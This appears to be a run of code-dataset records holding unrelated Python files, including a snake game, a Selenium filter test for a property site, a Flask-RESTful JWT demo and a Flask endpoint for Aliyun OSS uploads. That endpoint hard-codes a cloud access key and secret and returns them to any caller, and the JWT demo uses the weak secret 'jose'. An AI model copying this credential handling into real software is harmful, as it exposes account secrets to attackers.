print(\"decorator.simple_foo函数名是\"+decorator.simple_foo.__name__)\r\n \r\n print('--------')\r\n decorator2.foo()\r\n foo=timeit3(decorator2.foo)\r\n foo()\r\n decorator2.simple_foo()\r\n\r\n print\r\n sandwich()\r\n print\r\n sandwich = bread(ingredients(sandwich))\r\n sandwich()\r\n print\r\n strange_sandwich()\r\n ","sub_path":"src/base/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505053326","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# def weierstrass(x):\ndef f(x):\n result = 0\n for i in range(0,101):\n result += (a**i)*(np.cos((b**i)*np.pi*x))\n return result\n\nN = 2\na = 0.0\nb = 0.5\n\n# a_new to address singularities in the integral\na_new = a+ 0.000000001\n# # 2) Adaptive Trapezoidal Rule\n# # Since the adaptive trapezoidal needs the integral value of the (i-1)th integral,\n# # it should be coded too\n\n# # Trapezoidal method written with reference to the formula\n\ndef trapezoidal(N):\n h = (b-a_new)/N\n s = 0.5*f(a_new) + 0.5*f(b)\n for i in range(1,N):\n s = s + f(a_new+(i*h))\n s = s*h\n return s\n# print(\"trap: \", trapezoidal(N))\n\n# Helper function calculating adaptive method to calculate the odd steps of the integral.\ndef adaptive(N):\n h = (b-a)/N\n s = 0\n for i in range(1, N, 2):\n s += f(a+(i*h))\n s = s*h\n return s\n# print(\"adap: \", adaptive(N))\n\n\n# error array \ne = []\n# result array\nr = []\n# slices array\nslices = []\n# for plotting graph\nx = []\ny = []\n\ndef adaptive_trapezoidal(N):\n error = 1\n # anything more accurate than 1.0e-4 will take too long to compute\n accuracy = 1.0e-5\n s = trapezoidal(N)\n s_old = s\n while error > accuracy:\n N = N*2\n s = s_old/2.0 + adaptive(N)\n error = abs(s-s_old)/3.0\n s_old = s\n # print(error)\n # print(N)\n # print(error)\n x.append(math.log(N/2,2))\n y.append(math.log(error,10))\n e.append(error)\n r.append(s)\n slices.append(N)\n # return(s)\n return s\n\nadaptive_trapezoidal(N)\n\n# for i in range(0, len(e)):\n# print(i,\"th Error: \", e[i],\"Result: \", r[i], \"Slices: \", slices[i])\n\n# # print(\"Adaptive Trapezoidal Rule: \", adaptive_trapezoidal(N))\n\n# plt.figure()\n# plt.title('This is the Adaptive Trapezoidal results')\n# plt.plot(x,y,'*-')\n# plt.xlabel(r'$log_2(N/10)$')\n# plt.xlim(0,max(x))\n# plt.ylabel(r'$log_{10}(Integral_Result)$')\n# plt.show()","sub_path":"numerical_integrals/Q2_Adaptive_Trapezoidal_Weierstrass.py","file_name":"Q2_Adaptive_Trapezoidal_Weierstrass.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574992544","text":"import pygame\nfrom pygame.locals import *\nfrom random import randint\n\n\ndef colisão(c1, c2):\n return (c1[0] == c2[0]) and (c1[1] == c2[1])\n\n\ndef grid():\n x = randint(0, 59)\n y = randint(0, 59)\n return x * 10, y * 10\n\n\ndef Jogo():\n cima = 0\n direita = 1\n baixo = 2\n esquerda = 3\n\n pygame.init()\n screen = pygame.display.set_mode((600, 600))\n pygame.display.set_caption('Ebony * Snake')\n\n snake = [(200, 200), (210, 200), (220, 200)]\n snake_skin = pygame.Surface((10, 10))\n\n maçã = pygame.Surface((10, 10))\n maçã.fill((255, 0, 0)) # Vermelho\n maçã_pos = grid()\n\n direção = esquerda\n\n velocidade = pygame.time.Clock()\n\n pygame.font.init()\n font = pygame.font.SysFont('Ubuntu', 18)\n pontos = 0\n\n gameover = False\n\n while not gameover:\n if pontos < 10:\n 
velocidade.tick(10)\n snake_skin.fill((205, 205, 205))\n elif pontos < 20:\n velocidade.tick(12)\n snake_skin.fill((0, 127, 225))\n elif pontos < 40:\n velocidade.tick(14)\n snake_skin.fill((235, 199, 158))\n elif pontos < 60:\n velocidade.tick(18)\n snake_skin.fill((255, 0, 255))\n elif pontos < 100:\n velocidade.tick(20)\n snake_skin.fill((127, 0, 255))\n elif pontos < 150:\n velocidade.tick(25)\n snake_skin.fill((255, 165, 0))\n elif pontos < 200:\n velocidade.tick(30)\n snake_skin.fill((255, 255, 0))\n elif pontos < 250:\n velocidade.tick(35)\n snake_skin.fill((140, 23, 23))\n\n else:\n velocidade.tick(40)\n snake_skin.fill((255, 0, 0))\n\n for evento in pygame.event.get():\n if evento.type == QUIT:\n pygame.quit()\n exit()\n\n if evento.type == KEYDOWN:\n if evento.key == K_UP and direção != baixo:\n direção = cima\n if evento.key == K_DOWN and direção != cima:\n direção = baixo\n if evento.key == K_LEFT and direção != direita:\n direção = esquerda\n if evento.key == K_RIGHT and direção != esquerda:\n direção = direita\n\n if colisão(snake[0], maçã_pos):\n maçã_pos = grid()\n snake.append((0, 0))\n pontos += 1\n\n # Verificando se a snake acerta as laterais.\n if snake[0][0] == 600 or snake[0][1] == 600 or snake[0][0] < 0 or snake[0][1] < 0:\n gameover = True\n break\n\n # Verificando se a snake acerta a si mesma.\n for i in range(1, len(snake) - 1):\n if snake[0][0] == snake[i][0] and snake[0][1] == snake[i][1]:\n gameover = True\n break\n\n if gameover:\n break\n\n for i in range(len(snake) - 1, 0, -1):\n snake[i] = (snake[i - 1][0], snake[i - 1][1])\n\n # Movimentação incrementada\n if direção == cima:\n snake[0] = (snake[0][0], snake[0][1] - 10)\n if direção == baixo:\n snake[0] = (snake[0][0], snake[0][1] + 10)\n if direção == direita:\n snake[0] = (snake[0][0] + 10, snake[0][1])\n if direção == esquerda:\n snake[0] = (snake[0][0] - 10, snake[0][1])\n\n screen.fill((0, 0, 0))\n screen.blit(maçã, maçã_pos)\n\n # Desenho das linhas\n for x in range(0, 600, 10):\n pygame.draw.line(screen, (40, 40, 40), (x, 0), (x, 600))\n for y in range(0, 600, 10):\n pygame.draw.line(screen, (40, 40, 40), (0, y), (600, y))\n\n pontos_font = font.render('Pontos: %s' % pontos, True, (255, 255, 255))\n pontos_rect = pontos_font.get_rect()\n pontos_rect.topleft = (600 - 120, 10)\n screen.blit(pontos_font, pontos_rect)\n\n for posição in snake:\n screen.blit(snake_skin, posição)\n\n pygame.display.update()\n\n while True:\n gameover_font = pygame.font.Font(None, 90)\n gameover_screen = gameover_font.render('Game Over!', True, (0, 220, 0))\n gameover_rect = gameover_screen.get_rect()\n gameover_rect.midtop = (500 / 2, 10)\n screen.blit(gameover_screen, gameover_rect)\n name_font = pygame.font.Font(None, 30)\n name_screen = name_font.render('@ebony.prog', True, (0, 255, 200))\n name_rect = name_screen.get_rect()\n name_rect.midtop = (500 / 3.5, 65)\n screen.blit(name_screen, name_rect)\n\n pygame.display.update()\n pygame.time.wait(500)\n\n while True:\n for evento in pygame.event.get():\n if evento.type == QUIT:\n pygame.quit()\n exit()\n","sub_path":"snake/snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"121028255","text":"from django.urls import path\nfrom .views import signupView, HomeView, BusinessProfilesView, CustomerProfilesView, EditProfileView , CategoryMenu , SearchedView , DetailPageView, DirectionsView, logoutview, Dashboard, AboutPage\nfrom .views import 
Editsite, VisitsiteView, DomainView, RecomendView, NameSearchView\nfrom Responses.views import ReviewsView\n\nurlpatterns = [\n path('accounts/signup/', signupView, name=\"signup\"),\n path('', HomeView, name=\"home\"),\n path('searchedbiz',NameSearchView,name=\"searchedname\"),\n path('recommend',RecomendView,name=\"rec\"),\n path('accounts/logout/',logoutview,name='logout'),\n path('profiles/business/', BusinessProfilesView, name='BusinessPro'),\n path('profiles/customer/', CustomerProfilesView, name='CustomerPro'),\n path('editmyprofile',EditProfileView,name=\"editprofile\"),\n path('category//',CategoryMenu,name='categorymenu'),\n path('searched/business/',SearchedView,name='searched'),\n path('details///',DetailPageView,name='details'),\n path('directions//',DirectionsView,name='directions'),\n path('dashboard/',Dashboard,name='dashboard'),\n path('pages/about',AboutPage,name=\"AboutPage\"),\n path('Editsite',Editsite,name=\"editsite\"),\n path('typ/name',DomainView),\n path('Visitsite//',VisitsiteView, name='sitevisit'),\n\n\n\n\n]\n","sub_path":"Pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336269713","text":"#-*- coding: utf-8 -*-\n\nfrom selenium import webdriver\nimport os\nimport time\nimport unittest\nimport sys, traceback\nimport random\nimport platform\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import Select\n\nPATH = lambda p: os.path.abspath(\n os.path.join(os.path.dirname(__file__), p)\n)\n\nclass filter_oneroomTest(unittest.TestCase):\n\n def __init__(self, x):\n super().__init__()\n self.x = x\n\n def moveTab(self, x):\n window_before = self.driver.window_handles[x]\n self.driver.switch_to_window(window_before)\n return time.sleep(2)\n\n def setUp(self):\n self.chromeDriver = PATH('../drivers/chromedriver')\n self.driver = webdriver.Chrome(executable_path=self.chromeDriver)\n self.wait = WebDriverWait(self.driver, 5)\n\n def runTest(self):\n count = 0\n while True:\n try:\n zigbangUrl = \"https://www.zigbang.com/\"\n\n # 0. 직방 웹페이지 접속\n\n self.driver.get(zigbangUrl)\n time.sleep(1)\n\n self.driver.add_cookie({'name': 'cookie_sms_app_down', 'value': 'true'})\n # 지도 앱 다운로드 팝업 쿠키 True 값 고정\n\n self.driver.maximize_window()\n\n # 1. 원,투룸 접속\n\n self.wait.until(EC.visibility_of_element_located((By.CLASS_NAME, 'has_d2'))).click()\n time.sleep(1)\n\n # 2. 방 구조 '오픈형 원룸' 선택 및 유효성 검사\n\n checkOption = self.wait.until(EC.visibility_of_any_elements_located((By.XPATH, \"//input[@type='checkbox']\")))\n\n for i in range(1,5,1):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n openType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in openType:\n if not (i.text == u\"오픈형 원룸\"):\n raise Exception(u\"방구조가 오픈형 원룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-1. 방 구조 '분리형 원룸' 선택 및 유효성 검사\n\n for i in reversed(range(0,2,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n partroomType = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in partroomType:\n if not (i.text == u\"분리형 원룸\"):\n raise Exception(u\"방구조가 분리형 원룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-2. 
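The urls.py record above lost its angle-bracket path segments during extraction (e.g. path('category//', ...)); the original converter names are unrecoverable, but for reference this is the shape such routes take when a custom converter is registered via django.urls.register_converter (converter and view names here are illustrative only, not the record's originals):

    from django.urls import path, register_converter

    class FourDigitYearConverter:
        regex = "[0-9]{4}"

        def to_python(self, value):
            return int(value)

        def to_url(self, value):
            return "%04d" % value

    register_converter(FourDigitYearConverter, "yyyy")

    def year_archive(request, year):
        ...

    urlpatterns = [
        path("archive/<yyyy:year>/", year_archive, name="archive"),
    ]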
방 구조 '복층형 원룸' 선택 및 유효성 검사\n\n for i in reversed(range(1,3,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n upType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in upType:\n if not (i.text == u\"복층형 원룸\"):\n raise Exception(u\"방구조가 복층형 원룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-3. 방 구조 '투룸' 선택 및 유효성 검사\n\n for i in reversed(range(2,4,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n tworoomType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in tworoomType:\n if not (i.text == u\"투룸\"):\n raise Exception(u\"방구조가 투룸 이 아닌 매물이 존재합니다.\", i.text)\n\n # 2-4. 방 구조 '쓰리룸+' 선택 및 유효성 검사\n\n for i in reversed(range(3,5,1)):\n checkOption[i].click()\n time.sleep(4)\n time.sleep(2)\n\n threeroomType = self.wait.until(EC.visibility_of_any_elements_located((By.CSS_SELECTOR, \".i-info > em\")))\n time.sleep(1)\n\n for i in threeroomType:\n if not (i.text == u\"쓰리룸\"+u\"+\"):\n raise Exception(u\"방구조가 쓰리룸+ 이 아닌 매물이 존재합니다.\", i.text)\n\n for i in range(0,4):\n checkOption[i].click()\n time.sleep(1)\n time.sleep(3)\n\n # 3. 보증금 검색 조건 랜덤 선택\n\n emptyDeposit = []\n\n depositStart = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'deposit_s'))))\n depositEnd = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'deposit_e'))))\n # 샐랙트 박스의 값\n\n depositOption = self.wait.until(EC.visibility_of_element_located((By.XPATH, \"//select[@name='deposit_s']\")))\n depositoptValue = depositOption.find_elements_by_tag_name(\"option\")\n\n for i in depositoptValue:\n emptyDeposit.append(i.get_attribute(\"value\"))\n\n depositstartValue = [i.text for i in depositStart.options]\n depositendValue = [i.text for i in depositEnd.options]\n # 샐랙트 박스에 대한 옵션 값들\n\n minDeposit = random.randint(1, len(depositstartValue) - 1)\n maxDeposit = random.randint(minDeposit,len(depositendValue) - 1)\n # (1,18)\n\n depositStart.select_by_visible_text(depositstartValue[minDeposit])\n time.sleep(3)\n depositEnd.select_by_visible_text(depositendValue[maxDeposit])\n time.sleep(3)\n # 실제로 셀렉트 박스 선택하는 부분\n\n # 4. 선택된 보증금 필터 값, 실제 매물과 비교\n\n depositCompmin = int(emptyDeposit[minDeposit])\n depositCompmax = int(emptyDeposit[maxDeposit])\n\n itemValue = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, \".i-tit\")))\n # 매물의 금액 값\n\n for i in itemValue:\n depositValue = (i.text).split('/')\n depositEog = depositValue[0].split('억')\n\n if len(depositEog[0]) == 1:\n depositChun = depositEog[1].replace(',', '')\n depositEmpty = int(depositEog[0] + (\"0\" * (4 - len(depositChun))) + depositChun)\n\n else:\n depositChun_Only = depositEog[0].replace(',', '')\n depositEmpty = int(\"0\" * (4 - len(depositChun_Only)) + depositChun_Only)\n\n if not depositCompmin <= depositEmpty <= depositCompmax:\n raise Exception(\"보증금 필터 값과 검색 결과 값이 상이함으로 자동화를 종료합니다.\", depositCompmin, depositEmpty, depositCompmax)\n\n depositStart.select_by_visible_text(depositstartValue[0])\n depositEnd.select_by_visible_text(depositendValue[0])\n\n # 5. 
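Each numbered block in the Selenium test above repeats the same toggle-checkboxes-then-verify-labels sequence, with only the indices and the expected label changing; a parameterized sketch of that step (the helper name is hypothetical; wait and checkboxes are the objects the test already holds):

    import time

    from selenium.webdriver.common.by import By
    from selenium.webdriver.support import expected_conditions as EC

    def assert_room_type(wait, checkboxes, indices, expected):
        # Toggle the given filter checkboxes, then check every listing label.
        for i in indices:
            checkboxes[i].click()
            time.sleep(2)
        labels = wait.until(EC.visibility_of_any_elements_located(
            (By.CSS_SELECTOR, ".i-info > em")))
        for el in labels:
            if el.text != expected:
                raise Exception("Room type mismatch in results", el.text)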
월세 검색 조건 랜덤 선택\n\n emptyRent = []\n\n rentStart = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'rent_s'))))\n rentEnd = Select(self.wait.until(EC.visibility_of_element_located((By.ID, 'rent_e'))))\n # 샐랙트 박스의 값\n\n rentOption = self.wait.until(EC.visibility_of_element_located((By.XPATH, \"//select[@name='rent_s']\")))\n rentoptValue = rentOption.find_elements_by_tag_name(\"option\")\n\n for i in rentoptValue:\n emptyRent.append(i.get_attribute(\"value\"))\n\n rentstartValue = [i.text for i in rentStart.options]\n rentendValue = [i.text for i in rentEnd.options]\n # 샐랙트 박스에 대한 옵션 값들\n\n minRent = random.randint(2, len(rentstartValue) - 1)\n maxRent = random.randint(minRent, len(rentendValue) - 1)\n # 2,18\n\n rentStart.select_by_visible_text(rentstartValue[minRent])\n time.sleep(3)\n rentEnd.select_by_visible_text(rentendValue[maxRent])\n time.sleep(3)\n # 실제로 셀렉트 박스 선택하는 부분\n\n # 6. 선택된 월세 필터 값, 실제 매물과 비교\n\n rentCompmin = int(emptyRent[minRent])\n rentCompmax = int(emptyRent[maxRent])\n\n itemValue = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, \".i-tit\")))\n # 매물의 금액\n\n for i in itemValue:\n rentValue = (i.text).split('/')\n rentSpace = rentValue[1].split(' ')\n\n rentEmpty = 0\n\n if len(rentSpace[0]) <= 3:\n rentEmpty = int(rentSpace[0])\n\n if not rentCompmin <= rentEmpty <= rentCompmax:\n raise Exception(\"월세 필터 값과 검색 결과 값이 상이함으로 자동화를 종료합니다.\", rentCompmin, rentEmpty, rentCompmax)\n\n rentStart.select_by_visible_text(rentstartValue[0])\n rentEnd.select_by_visible_text(rentendValue[0])\n\n break\n\n except Exception:\n\n if count == 2:\n raise\n\n else:\n traceback.print_exc(file=sys.stdout)\n print(\"에러 발생 페이지 URL : \", self.driver.current_url)\n self.driver.quit()\n self.setUp()\n count += 1\n\n def tearDown(self):\n self.driver.quit()","sub_path":"wwwauto/www_02_filter_oneroom.py","file_name":"www_02_filter_oneroom.py","file_ext":"py","file_size_in_byte":10196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"15057336","text":"# coding:utf-8\nfrom aliyunsdkcore import client\nfrom aliyunsdksts.request.v20150401 import AssumeRoleRequest\nimport json\nimport oss2\n\nfrom . 
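The deposit comparison above decodes listing prices such as "1억2,000/50" by zero-padding the digits after '억'; the same conversion isolated into one function (parse_deposit is a hypothetical name; amounts are assumed to be in units of 만원, so 1억 counts as 10,000):

    def parse_deposit(price_text):
        # "1억2,000/50" -> 12000, "3,000/30" -> 3000
        deposit = price_text.split('/')[0]
        parts = deposit.split('억')
        if len(parts) == 2:
            rest = parts[1].replace(',', '')
            return int(parts[0]) * 10000 + (int(rest) if rest else 0)
        return int(parts[0].replace(',', ''))

    assert parse_deposit('1억2,000/50') == 12000
    assert parse_deposit('3,000/30') == 3000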
import api, formart_json\nfrom flask import request, current_app\nfrom Travel.utils.response_code import RET\nfrom flask import jsonify\nfrom Travel import db\nfrom Travel.models import UserAndClockInPics\n\n\n\n@api.route(\"/saveClockPic\", methods=[\"POST\"])\ndef save_clock_pic():\n\n req_dict = request.get_json()\n if req_dict is None:\n return formart_json.formattingjson(data={}, errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n user_id = req_dict.get(\"id\")\n pic_url = req_dict.get(\"url\")\n location_type = req_dict.get(\"locationType\")\n\n if not all([user_id, pic_url, location_type >= 0]):\n return formart_json.formattingjson(data={}, errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n # 添加数据库\n pics = UserAndClockInPics(user_id=int(user_id), url=pic_url, attractions_type=location_type)\n try:\n db.session.add(pics)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"查询数据库异常\")\n\n return formart_json.formattingjson(data={'currentLocation': int(location_type) + 1}, errno=RET.OK, errmsg=\"添加成功\")\n\n\n\n@api.route(\"/getAliOSSToken\", methods=[\"GET\"])\ndef get_alioss_token():\n \"\"\"用户登录\n 参数:姓名、手机号 或者 id\n \"\"\"\n req_dict = request.args\n user_id = req_dict.get(\"id\")\n if not all([user_id]):\n return formart_json.formattingjson(data={}, errno=RET.PARAMERR, errmsg=\"参数不完整\")\n\n info = {}\n info['region'] = 'oss-cn-beijing'\n info['accessKeyId'] = 'LTAI4Fw3KZuEbdgwVnfdLePo'\n info['accessKeySecret'] = 'TThvS2I3iGVC8XkYevFPl6cPCJ2ikR'\n info['bucket'] = 'sharui-oss'\n\n return formart_json.formattingjson(data=info, errno=RET.OK, errmsg=\"获取token成功\")\n\n\n\n\n # # Endpoint以杭州为例,其它Region请按实际情况填写。\n # endpoint = 'oss-cn-beijing.aliyuncs.com'\n # # 阿里云主账号AccessKey拥有所有API的访问权限,风险很高。强烈建议您创建并使用RAM账号进行API访问或日常运维,请登录 https://ram.console.aliyun.com 创建RAM账号。\n # access_key_id = 'LTAI4Fw3KZuEbdgwVnfdLePo'\n # access_key_secret = 'TThvS2I3iGVC8XkYevFPl6cPCJ2ikR'\n # bucket_name = 'sharui-oss'\n # # role_arn是角色的资源名称。\n # role_arn = 'acs:ram::1645815546833249:role/sharui'\n #\n #\n #\n # clt = client.AcsClient(access_key_id, access_key_secret, 'cn-beijing')\n # req = AssumeRoleRequest.AssumeRoleRequest()\n #\n # # 设置返回值格式为JSON。\n # req.set_accept_format('json')\n # req.set_RoleArn(role_arn)\n # req.set_RoleSessionName('session-name')\n # body = clt.do_action_with_exception(req)\n #\n # # 使用RAM账号的AccessKeyId和AccessKeySecret向STS申请临时token。\n # token = json.loads(body)\n\n # return formart_json.formattingjson(data={'token': token}, errno=RET.OK, errmsg=\"获取token成功\")\n","sub_path":"Travel/api_1_0/alioss.py","file_name":"alioss.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"271296644","text":"import numpy as np\nimport os\nimport glob\nimport tensorflow as tf\nimport PIL.Image\n\nROOT_DIR = 'data'\nDATA_LIST = glob.glob(ROOT_DIR + '\\\\*\\\\*.jpg')\nIMG_SIZE = 256\nRESIZED_DIR = \"resized\"\n\ndef get_label(path):\n return path.split('\\\\')[1]\n\ndef get_file_name(path):\n return path.split('\\\\')[2]\n\ndef make_dir(label, keyword=\"aug\"):\n dir = ROOT_DIR + \"\\\\\" +label + \"\\\\\"+ keyword + \"\\\\\"\n if not os.path.exists(dir):\n os.makedirs(dir)\n print(\"--> \", dir)\n return dir\n\ndef resize(org_img):\n image = PIL.Image.open(org_img)\n resized = image.resize((IMG_SIZE,IMG_SIZE))\n dir = make_dir(get_label(org_img), RESIZED_DIR)\n resized.save(dir + get_file_name(org_img), \"JPEG\", quality=100)\n return 
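getAliOSSToken above hands the long-lived AccessKey pair straight to the client; the commented-out block at the end of that record sketches the safer STS temporary-token flow. Condensed into a function using the same aliyunsdkcore calls as the record (argument values are placeholders, not working credentials):

    import json

    from aliyunsdkcore import client
    from aliyunsdksts.request.v20150401 import AssumeRoleRequest

    def fetch_sts_token(access_key_id, access_key_secret, role_arn,
                        region='cn-beijing', session_name='session-name'):
        # Exchange a RAM account's key pair for short-lived STS credentials.
        clt = client.AcsClient(access_key_id, access_key_secret, region)
        req = AssumeRoleRequest.AssumeRoleRequest()
        req.set_accept_format('json')
        req.set_RoleArn(role_arn)
        req.set_RoleSessionName(session_name)
        return json.loads(clt.do_action_with_exception(req))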
resized\n\ndef write_tf(tf_img, org_img, keyword):\n dir = make_dir(get_label(org_img), keyword)\n enc = tf.io.encode_jpeg(tf_img, quality = 100)\n tf.io.write_file(dir+\"\\\\\"+dir.split('\\\\')[2][0:2]+\"-\"+get_file_name(org_img), enc)\n\ndef augment(res_img):\n image_string = tf.io.read_file(res_img)\n image = tf.image.decode_jpeg(image_string, channels = 3)\n \n flipped = tf.image.flip_left_right(image)\n write_tf(flipped, res_img, \"flipped\")\n\n rotated = tf.image.rot90(image)\n write_tf(rotated, res_img, \"rotated\")\n\n grayscaled = tf.image.rgb_to_grayscale(image)\n write_tf(grayscaled, res_img, \"grayscaled\")\n\n saturated = tf.image.adjust_saturation(image, 3)\n write_tf(saturated, res_img, \"saturated\")\n\n bright = tf.image.adjust_brightness(image, 0.4)\n write_tf(bright, res_img, \"bright\")\n\n\nfor org_img in DATA_LIST:\n resize(org_img)\n res_img = make_dir(get_label(org_img), RESIZED_DIR) + get_file_name(org_img)\n augment(res_img)\n","sub_path":"data_augmentation_template.py","file_name":"data_augmentation_template.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"124107470","text":"N, M, K = list(map(int, input().split()))\nH = list(map(int, input().split()))\nC = set(map(lambda x: int(x) - 1, input().split()))\norder = [(i, H[i]) for i in range(N)]\norder.sort(key=lambda x: x[1])\ngraph = [[] for _ in range(N)]\n\ndp = [float('inf')]*N\nfor _ in range(M):\n A, B = list(map(lambda x: int(x) - 1, input().split()))\n if H[A] > H[B]:\n graph[A].append(B)\n else:\n graph[B].append(A)\n\nfor v, h in order:\n if v in C:\n dp[v] = 0\n else:\n if graph[v]:\n dp[v] = min([dp[x] for x in graph[v]]) + 1\n\nfor ans in dp:\n if ans == float('inf'):\n print(-1)\n else:\n print(ans)","sub_path":"PAST05/I.py","file_name":"I.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"317419965","text":"from flask import Flask,request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_jwt import JWT,jwt_required\nfrom security import authenticate,identity\n\napp = Flask(__name__)\napi = Api(app)\napp.secret_key = 'jose'\njwt = JWT(app,authenticate,identity) \n\nitems = [\n {\n \"name\":\"bag\",\n \"price\":24\n }\n]\n\nclass Item(Resource):\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"price\",\n type=float,\n required=True,\n help=\"This field cannot be left blank!\"\n )\n \n \n @jwt_required()\n def get(self,name):\n data=next(filter(lambda x: x[\"name\"]==name,items),None)\n \n return data,200 if data is not None else 404\n def post(self,name):\n \n if next(filter(lambda x: x[\"name\"]==name,items),None):\n return {\"message\":f\"The item with name {name} alredy exists\"},400\n data = Item.parser.parse_args()\n print(data[\"price\"])\n item = {\"name\":name,\"price\":data[\"price\"]}\n items.append(item)\n return item,201\n @jwt_required()\n def delete(self, name):\n global items\n items = list(filter(lambda x: x['name'] != name, items))\n return {'message': 'Item deleted'}\n def put(self,name):\n# data = request.get_json(force = True)\n data = Item.parser.parse_args()\n item = next(filter(lambda x: x[\"name\"]==name,items),None)\n if item is None:\n item = {\"name\":name,\"price\":data[\"price\"]}\n items.append(item)\n else:\n item.update(data)\n return item\n \n \nclass ItemList(Resource):\n \n def get(self):\n return {\"item\":items}\n def post(self):\n data = 
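The PAST05 solution above depends on visiting vertices in ascending height, so every lower neighbour's dp value is already final when it is read; a tiny self-contained check of that invariant:

    H = [3, 2, 1]            # heights
    graph = [[1], [2], []]   # each edge is stored on its higher endpoint
    C = {2}                  # vertex 2 is a shop

    dp = [float('inf')] * len(H)
    for v in sorted(range(len(H)), key=lambda i: H[i]):
        if v in C:
            dp[v] = 0
        elif graph[v]:
            dp[v] = min(dp[x] for x in graph[v]) + 1

    assert dp == [2, 1, 0]  # two hops from vertex 0 down to the shop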
request.get_json(force = True)\n item = {\"name\":data[\"name\"],\"price\":data[\"price\"]}\n items.append(item)\n return item\n# def delete(self,name):\n# global items\n# items = list(filter(lambda x: x['name'] != name,items))\n# return {'message':\"item deleted\"}\n \n \napi.add_resource(Item,\"/item/\")\napi.add_resource(ItemList,\"/items\")\n\napp.run(port=1100,debug = True)","sub_path":"Section4/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"555006274","text":"import unittest\nfrom ..decorators import batch_apply_ignore_if_unsupported\n\n@batch_apply_ignore_if_unsupported('CONTENTS')\nclass ContentsTestMixin(object):\n def test_contents_name(self: unittest.TestCase,):\n self.assertEqual(\n self.result_set.contents.name,\n self.contents.name,\n \"Contents Name Mismatch\"\n )\n \n def test_contents_publication_status(self: unittest.TestCase,):\n self.assertEqual(\n self.contents.publication_status,\n self.result_set.contents.publication_status,\n \"Series Publication Status Mismatch\"\n )\n \n def test_contents_scanning_status(self: unittest.TestCase,):\n self.assertEqual(\n self.contents.scanning_status,\n self.result_set.contents.scanning_status,\n \"Series Scanning Status Mismatch\"\n )\n \n def test_contents_chapter_count(self: unittest.TestCase,):\n self.assertGreaterEqual(\n len(self.contents.listings),\n self.result_set.contents.min_chapter_count,\n \"Chapter Count Misrepresentation\"\n )\n \n def test_contents_listing_names(self: unittest.TestCase,):\n self.assertEqual(\n self.first_chapter_listing.name,\n self.result_set.first_chapter_listing.name,\n \"First Chapter Listing Name Mismatch\"\n )\n \n self.assertEqual(\n self.last_chapter_listing.name,\n self.result_set.last_chapter_listing.name,\n \"Last Chapter Listing Name Mismatch\"\n )\n \n def test_contents_listing_date(self: unittest.TestCase,):\n self.assertEqual(\n self.first_chapter_listing.date,\n self.result_set.first_chapter_listing.date,\n \"First Chapter Listing Date Mismatch\"\n )\n \n self.assertEqual(\n self.last_chapter_listing.date,\n self.result_set.last_chapter_listing.date,\n \"Last Chapter Listing Date Mismatch\"\n )\n \n def test_contents_listing_url(self: unittest.TestCase,):\n self.assertEqual(\n self.first_chapter_listing.url,\n self.result_set.first_chapter_listing.url,\n \"First Chapter Listing URL Mismatch\"\n )\n \n self.assertEqual(\n self.last_chapter_listing.url,\n self.result_set.last_chapter_listing.url,\n \"Last Chapter Listing URL Mismatch\"\n )","sub_path":"tests/grabbers/test_case/mixins/contents_test_mixin.py","file_name":"contents_test_mixin.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364997429","text":"import itsdangerous\nfrom flask import (request,\n current_app as app,\n redirect,\n url_for,\n flash,\n render_template, make_response)\nfrom flask_security import (current_user,\n login_required,\n 